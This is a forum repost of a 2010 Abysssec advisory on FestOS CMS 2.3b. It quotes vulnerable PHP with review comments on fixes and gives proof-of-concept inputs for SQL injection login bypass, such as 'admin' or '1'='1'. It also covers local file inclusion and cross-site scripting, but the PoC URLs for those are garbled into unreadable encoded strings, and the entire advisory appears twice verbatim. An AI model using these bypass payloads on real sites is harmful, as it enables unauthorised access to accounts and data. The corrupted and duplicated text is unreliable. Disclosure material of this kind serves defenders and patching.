[转帖]MOAUB #9 - FestOS CMS 2.3b Multiple Remote Vulnerabilities
发表于: 2010-9-10 14:12 2417
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ < Day 9 (0day)
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
0feK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3#2G2j5i4g2T1i4K6u0V1z5g2)9J5k6r3k6W2M7%4c8G2M7#2)9J5k6r3y4E0M7#2)9J5k6o6u0Q4x3X3b7K6j5W2)9J5k6r3#2#2L8s2c8A6M7r3I4W2i4K6u0V1M7X3g2E0L8%4c8W2i4K6u0V1N6Y4g2D9L8X3g2J5j5h3u0A6L8r3W2@1K9h3g2K6i4K6u0r3
'''
Title : FestOS CMS 2.3b Multiple Remote Vulnerabilities
Affected Version : <=2.3b
Vendor Site : 09bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3k6W2M7%4c8W2L8X3N6A6L8X3g2Q4x3X3g2G2M7X3N6Q4x3V1j5`.
Discovery : abysssec.com
Description :
This CMS has many critical vulnerabilities; we refer to some of them here:
Vulnerabilities :
1- SQL Injection
Vulnerability :
1.1- in admin/do_login.php line 17:
// Process the login
// NOTE(review): $_POST['username'] is concatenated straight into the SQL string after
// strtolower(); there is no escaping and no parameter binding, so a single quote in the
// username terminates the literal and the rest of the input becomes SQL (the injection
// this advisory describes). Only the password side is transformed (md5), which does not
// protect the username side. $config['dbprefix'] comes from server-side configuration.
// Mitigation: bind both values through a prepared statement, and replace unsalted md5
// with password_hash()/password_verify().
$query = "SELECT userid, roleID, username FROM ".$config['dbprefix']."users WHERE LCASE(username) = '".strtolower($_POST['username'])."' and password ='".md5($_POST['password'])."'";
// $festos->query() receives the already-concatenated string; any escaping would have to
// happen before this line, and nothing visible here does it.
$res = $festos->query($query);
poc: in admin.php page:
username: admin' or '1'='1
password: admin' or '1'='1
1.2- in festos_z_dologin.php:
// NOTE(review): both $_POST['email'] and $_POST['password'] are interpolated into the SQL
// string unescaped and unbound, and the password is compared in clear text (not even
// hashed), so a quote in either field rewrites the WHERE clause. Mitigation: prepared
// statement with bound parameters, and a stored password hash checked via password_verify().
$query = "SELECT vendorID FROM ".$config['dbprefix']."vendors WHERE LCASE(email) = '".strtolower($_POST['email'])."' and password ='".$_POST['password']."'";
poc: in applications.php page:
email: anything
pass: a' or 1=1/*
2- Local File Inclusion (lfi):
Vulnerability in index.php (the theme value from the request is only checked with file_exists, which confirms the path exists but does not confine it to the themes directory, before the theme path is used in require_once):
line 41:
if(isset($_GET['theme']) && !empty($_GET['theme']) && file_exists($config['ABSOLUTE_FILE_PATH'].'themes/'.$_GET['theme'])) {
...
require_once($themepath.'/includes/header.php');
poc:
6a9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3W2F1k6r3g2^5i4K6u0W2M7r3S2H3i4K6y4r3N6r3S2W2L8h3g2Q4x3@1c8Q4x3X3g2Q4x3X3g2Q4x3V1k6S2k6r3#2A6L8W2)9J5c8X3y4K6M7#2)9J5c8X3q4V1L8h3W2F1i4K6u0W2j5%4y4K6i4K6t1#2x3o6l9`.
3d1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3q4J5N6r3W2K6N6s2y4Q4x3X3g2H3K9s2m8Q4x3@1k6@1K9r3g2E0k6g2)9K6c8q4)9J5k6g2)9J5k6g2)9J5c8X3q4V1L8h3W2F1i4K6u0r3j5%4y4K6i4K6u0r3j5h3c8E0K9h3&6Q4x3X3g2U0M7%4y4Q4x3U0f1H3x3l9`.`.
8f7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3y4G2L8Y4c8S2j5%4c8K6i4K6u0W2M7r3S2H3i4K6y4r3N6r3S2W2L8h3g2Q4x3@1c8Q4x3X3g2Q4x3X3g2Q4x3V1k6S2k6r3#2A6L8W2)9J5c8X3y4K6M7#2)9J5c8X3q4V1L8h3W2F1i4K6u0W2j5%4y4K6i4K6t1#2x3o6l9`.
d46K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3q4H3M7r3I4A6j5$3q4@1K9h3!0F1M7#2)9J5k6i4m8Z5M7q4)9K6c8Y4c8Z5k6h3#2W2i4K6y4p5i4K6u0W2i4K6u0W2i4K6u0r3j5h3c8E0K9h3&6Q4x3V1k6U0M7%4y4Q4x3V1k6S2k6r3#2A6L8W2)9J5k6h3y4K6M7#2)9J5y4e0l9H3
08bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3g2F1N6r3g2J5N6r3q4A6L8X3g2J5M7#2)9J5k6i4m8Z5M7q4)9K6c8Y4c8Z5k6h3#2W2i4K6y4p5i4K6u0W2i4K6u0W2i4K6u0r3j5h3c8E0K9h3&6Q4x3V1k6U0M7%4y4Q4x3V1k6S2k6r3#2A6L8W2)9J5k6h3y4K6M7#2)9J5y4e0l9H3
7abK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3g2^5K9r3W2T1K9i4c8G2M7Y4y4Q4x3X3g2H3K9s2m8Q4x3@1k6@1K9r3g2E0k6g2)9K6c8q4)9J5k6g2)9J5k6g2)9J5c8X3q4V1L8h3W2F1i4K6u0r3j5%4y4K6i4K6u0r3j5h3c8E0K9h3&6Q4x3X3g2U0M7%4y4Q4x3U0f1H3x3l9`.`.
880K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3k6G2L8$3c8$3k6h3&6V1L8%4u0K6i4K6u0W2M7r3S2H3i4K6y4r3N6r3S2W2L8h3g2Q4x3@1c8Q4x3X3g2Q4x3X3g2Q4x3V1k6S2k6r3#2A6L8W2)9J5c8X3y4K6M7#2)9J5c8X3q4V1L8h3W2F1i4K6u0W2j5%4y4K6i4K6t1#2x3o6l9`.
2bbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8Y4m8W2M7X3k6G2M7X3#2S2L8X3y4W2M7$3y4Z5k6h3c8#2L8r3g2Q4x3X3g2H3K9s2m8Q4x3@1k6@1K9r3g2E0k6g2)9K6c8q4)9J5k6g2)9J5k6g2)9J5c8X3q4V1L8h3W2F1i4K6u0r3j5%4y4K6i4K6u0r3j5h3c8E0K9h3&6Q4x3X3g2U0M7%4y4Q4x3U0f1H3x3l9`.`.
21bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8Y4y4H3L8$3&6K6L8%4u0K6i4K6u0W2M7r3S2H3i4K6y4r3N6r3S2W2L8h3g2Q4x3@1c8Q4x3X3g2Q4x3X3g2Q4x3V1k6S2k6r3#2A6L8W2)9J5c8X3y4K6M7#2)9J5c8X3q4V1L8h3W2F1i4K6u0W2j5%4y4K6i4K6t1#2x3o6l9`.
627K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8Y4N6A6L8X3&6W2M7Y4y4Q4x3X3g2H3K9s2m8Q4x3@1k6@1K9r3g2E0k6g2)9K6c8q4)9J5k6g2)9J5k6g2)9J5c8X3q4V1L8h3W2F1i4K6u0r3j5%4y4K6i4K6u0r3j5h3c8E0K9h3&6Q4x3X3g2U0M7%4y4Q4x3U0f1H3x3l9`.`.
3- Cross Site Scripting:
in foodvendors.php, the festos_foodvendors.php page is included.
lines 31-36.
switch($switcher) {
case 'details':
if(!isset($_GET['vendorID']) || ctype_digit($_GET['vendorID'])===FALSE || $_GET['vendorID'] == '') {
$template = 'foodvendors_nonespecified.tpl';
break;
}
and in line 74:
// NOTE(review): $_GET['category'] is handed to the template as-is; no htmlspecialchars() or
// other context-aware escaping is applied here, so the raw request value reaches the page
// wherever the template echoes $vType (foodvendors_nonespecified.tpl echoes it inside a
// title="" attribute and as text). Escape at the output point with
// htmlspecialchars($vType, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'). The key is also read
// without isset(), so a request without a category parameter produces an undefined-index
// notice/warning.
$tpl->set('vType', $_GET['category']);
and foodvendors_nonespecified.tpl
line 123:
<?php // NOTE(review): $vType (populated from $_GET['category']) is echoed twice on the next line, once inside the title="" attribute and once as element text, without htmlspecialchars(); wrap each echo with htmlspecialchars($vType, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'). $vTypeID is echoed unescaped into the href as well -- its origin is not visible here, so confirm it is validated upstream or escape it too. ?>
<p>Back to the list of <a href="<?php echo $_SERVER['PHP_SELF'];?>?view=list&vTypeID=<?php echo $vTypeID;?>" title="<?php echo $vType;?> Category">exhibitors in the <?php echo $vType;?> category</a>.</p>
the category parameter is passed to the template without escaping and echoed into the page, so it is vulnerable to XSS:
poc:
574K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3k6G2L8$3c8$3k6h3&6V1L8%4u0K6i4K6u0W2M7r3S2H3i4K6y4r3N6X3W2W2N6#2)9K6c8r3c8W2N6r3q4A6L8s2y4Q4x3U0k6$3k6h3&6V1L8%4u0u0c8q4)9K6c8o6c8Q4x3U0k6U0j5i4c8W2k6$3!0J5P5g2)9K6c8q4)9J5y4e0y4o6K9h3k6J5j5h3#2W2i4K6t1#2x3U0m8K6M7X3y4Q4x3@1c8B7j5i4k6S2M7$3y4J5K9i4m8@1i4K6y4m8j5h3I4W2M7Y4c8Q4x3U0f1J5z5q4)9J5y4e0t1J5h3q4y4e0i4K6t1#2x3U0u0Q4x3U0f1J5z5g2)9K6b7W2)9J5y4Y4k6f1P5i4m8W2d9f1c8Q4x3@1b7J5z5l9`.`.
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ < Day 9 (0day)
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
0feK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3#2G2j5i4g2T1i4K6u0V1z5g2)9J5k6r3k6W2M7%4c8G2M7#2)9J5k6r3y4E0M7#2)9J5k6o6u0Q4x3X3b7K6j5W2)9J5k6r3#2#2L8s2c8A6M7r3I4W2i4K6u0V1M7X3g2E0L8%4c8W2i4K6u0V1N6Y4g2D9L8X3g2J5j5h3u0A6L8r3W2@1K9h3g2K6i4K6u0r3
'''
Title : FestOS CMS 2.3b Multiple Remote Vulnerabilities
Affected Version : <=2.3b
Vendor Site : 09bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3k6W2M7%4c8W2L8X3N6A6L8X3g2Q4x3X3g2G2M7X3N6Q4x3V1j5`.
Discovery : abysssec.com
Description :
This CMS has many critical vulnerabilities; we refer to some of them here:
Vulnerabilities :
1- SQL Injection
Vulnerability :
1.1- in admin/do_login.php line 17:
// Process the login
// NOTE(review): $_POST['username'] is concatenated straight into the SQL string after
// strtolower(); there is no escaping and no parameter binding, so a single quote in the
// username terminates the literal and the rest of the input becomes SQL (the injection
// this advisory describes). Only the password side is transformed (md5), which does not
// protect the username side. $config['dbprefix'] comes from server-side configuration.
// Mitigation: bind both values through a prepared statement, and replace unsalted md5
// with password_hash()/password_verify().
$query = "SELECT userid, roleID, username FROM ".$config['dbprefix']."users WHERE LCASE(username) = '".strtolower($_POST['username'])."' and password ='".md5($_POST['password'])."'";
// $festos->query() receives the already-concatenated string; any escaping would have to
// happen before this line, and nothing visible here does it.
$res = $festos->query($query);
poc: in admin.php page:
username: admin' or '1'='1
password: admin' or '1'='1
1.2- in festos_z_dologin.php:
// NOTE(review): both $_POST['email'] and $_POST['password'] are interpolated into the SQL
// string unescaped and unbound, and the password is compared in clear text (not even
// hashed), so a quote in either field rewrites the WHERE clause. Mitigation: prepared
// statement with bound parameters, and a stored password hash checked via password_verify().
$query = "SELECT vendorID FROM ".$config['dbprefix']."vendors WHERE LCASE(email) = '".strtolower($_POST['email'])."' and password ='".$_POST['password']."'";
poc: in applications.php page:
email: anything
pass: a' or 1=1/*
2- Local File Inclusion (lfi):
Vulnerability in index.php (the theme value from the request is only checked with file_exists, which confirms the path exists but does not confine it to the themes directory, before the theme path is used in require_once):
line 41:
if(isset($_GET['theme']) && !empty($_GET['theme']) && file_exists($config['ABSOLUTE_FILE_PATH'].'themes/'.$_GET['theme'])) {
...
require_once($themepath.'/includes/header.php');
poc:
6a9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3W2F1k6r3g2^5i4K6u0W2M7r3S2H3i4K6y4r3N6r3S2W2L8h3g2Q4x3@1c8Q4x3X3g2Q4x3X3g2Q4x3V1k6S2k6r3#2A6L8W2)9J5c8X3y4K6M7#2)9J5c8X3q4V1L8h3W2F1i4K6u0W2j5%4y4K6i4K6t1#2x3o6l9`.
3d1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3q4J5N6r3W2K6N6s2y4Q4x3X3g2H3K9s2m8Q4x3@1k6@1K9r3g2E0k6g2)9K6c8q4)9J5k6g2)9J5k6g2)9J5c8X3q4V1L8h3W2F1i4K6u0r3j5%4y4K6i4K6u0r3j5h3c8E0K9h3&6Q4x3X3g2U0M7%4y4Q4x3U0f1H3x3l9`.`.
8f7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3y4G2L8Y4c8S2j5%4c8K6i4K6u0W2M7r3S2H3i4K6y4r3N6r3S2W2L8h3g2Q4x3@1c8Q4x3X3g2Q4x3X3g2Q4x3V1k6S2k6r3#2A6L8W2)9J5c8X3y4K6M7#2)9J5c8X3q4V1L8h3W2F1i4K6u0W2j5%4y4K6i4K6t1#2x3o6l9`.
d46K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3q4H3M7r3I4A6j5$3q4@1K9h3!0F1M7#2)9J5k6i4m8Z5M7q4)9K6c8Y4c8Z5k6h3#2W2i4K6y4p5i4K6u0W2i4K6u0W2i4K6u0r3j5h3c8E0K9h3&6Q4x3V1k6U0M7%4y4Q4x3V1k6S2k6r3#2A6L8W2)9J5k6h3y4K6M7#2)9J5y4e0l9H3
08bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3g2F1N6r3g2J5N6r3q4A6L8X3g2J5M7#2)9J5k6i4m8Z5M7q4)9K6c8Y4c8Z5k6h3#2W2i4K6y4p5i4K6u0W2i4K6u0W2i4K6u0r3j5h3c8E0K9h3&6Q4x3V1k6U0M7%4y4Q4x3V1k6S2k6r3#2A6L8W2)9J5k6h3y4K6M7#2)9J5y4e0l9H3
7abK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3g2^5K9r3W2T1K9i4c8G2M7Y4y4Q4x3X3g2H3K9s2m8Q4x3@1k6@1K9r3g2E0k6g2)9K6c8q4)9J5k6g2)9J5k6g2)9J5c8X3q4V1L8h3W2F1i4K6u0r3j5%4y4K6i4K6u0r3j5h3c8E0K9h3&6Q4x3X3g2U0M7%4y4Q4x3U0f1H3x3l9`.`.
880K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3k6G2L8$3c8$3k6h3&6V1L8%4u0K6i4K6u0W2M7r3S2H3i4K6y4r3N6r3S2W2L8h3g2Q4x3@1c8Q4x3X3g2Q4x3X3g2Q4x3V1k6S2k6r3#2A6L8W2)9J5c8X3y4K6M7#2)9J5c8X3q4V1L8h3W2F1i4K6u0W2j5%4y4K6i4K6t1#2x3o6l9`.
2bbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8Y4m8W2M7X3k6G2M7X3#2S2L8X3y4W2M7$3y4Z5k6h3c8#2L8r3g2Q4x3X3g2H3K9s2m8Q4x3@1k6@1K9r3g2E0k6g2)9K6c8q4)9J5k6g2)9J5k6g2)9J5c8X3q4V1L8h3W2F1i4K6u0r3j5%4y4K6i4K6u0r3j5h3c8E0K9h3&6Q4x3X3g2U0M7%4y4Q4x3U0f1H3x3l9`.`.
21bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8Y4y4H3L8$3&6K6L8%4u0K6i4K6u0W2M7r3S2H3i4K6y4r3N6r3S2W2L8h3g2Q4x3@1c8Q4x3X3g2Q4x3X3g2Q4x3V1k6S2k6r3#2A6L8W2)9J5c8X3y4K6M7#2)9J5c8X3q4V1L8h3W2F1i4K6u0W2j5%4y4K6i4K6t1#2x3o6l9`.
627K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8Y4N6A6L8X3&6W2M7Y4y4Q4x3X3g2H3K9s2m8Q4x3@1k6@1K9r3g2E0k6g2)9K6c8q4)9J5k6g2)9J5k6g2)9J5c8X3q4V1L8h3W2F1i4K6u0r3j5%4y4K6i4K6u0r3j5h3c8E0K9h3&6Q4x3X3g2U0M7%4y4Q4x3U0f1H3x3l9`.`.
3- Cross Site Scripting:
in foodvendors.php, the festos_foodvendors.php page is included.
lines 31-36.
switch($switcher) {
case 'details':
if(!isset($_GET['vendorID']) || ctype_digit($_GET['vendorID'])===FALSE || $_GET['vendorID'] == '') {
$template = 'foodvendors_nonespecified.tpl';
break;
}
and in line 74:
// NOTE(review): $_GET['category'] is handed to the template as-is; no htmlspecialchars() or
// other context-aware escaping is applied here, so the raw request value reaches the page
// wherever the template echoes $vType (foodvendors_nonespecified.tpl echoes it inside a
// title="" attribute and as text). Escape at the output point with
// htmlspecialchars($vType, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'). The key is also read
// without isset(), so a request without a category parameter produces an undefined-index
// notice/warning.
$tpl->set('vType', $_GET['category']);
and foodvendors_nonespecified.tpl
line 123:
<?php // NOTE(review): $vType (populated from $_GET['category']) is echoed twice on the next line, once inside the title="" attribute and once as element text, without htmlspecialchars(); wrap each echo with htmlspecialchars($vType, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'). $vTypeID is echoed unescaped into the href as well -- its origin is not visible here, so confirm it is validated upstream or escape it too. ?>
<p>Back to the list of <a href="<?php echo $_SERVER['PHP_SELF'];?>?view=list&vTypeID=<?php echo $vTypeID;?>" title="<?php echo $vType;?> Category">exhibitors in the <?php echo $vType;?> category</a>.</p>
the category parameter is passed to the template without escaping and echoed into the page, so it is vulnerable to XSS:
poc:
574K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3k6G2L8$3c8$3k6h3&6V1L8%4u0K6i4K6u0W2M7r3S2H3i4K6y4r3N6X3W2W2N6#2)9K6c8r3c8W2N6r3q4A6L8s2y4Q4x3U0k6$3k6h3&6V1L8%4u0u0c8q4)9K6c8o6c8Q4x3U0k6U0j5i4c8W2k6$3!0J5P5g2)9K6c8q4)9J5y4e0y4o6K9h3k6J5j5h3#2W2i4K6t1#2x3U0m8K6M7X3y4Q4x3@1c8B7j5i4k6S2M7$3y4J5K9i4m8@1i4K6y4m8j5h3I4W2M7Y4c8Q4x3U0f1J5z5q4)9J5y4e0t1J5h3q4y4e0i4K6t1#2x3U0u0Q4x3U0f1J5z5g2)9K6b7W2)9J5y4Y4k6f1P5i4m8W2d9f1c8Q4x3@1b7J5z5l9`.`.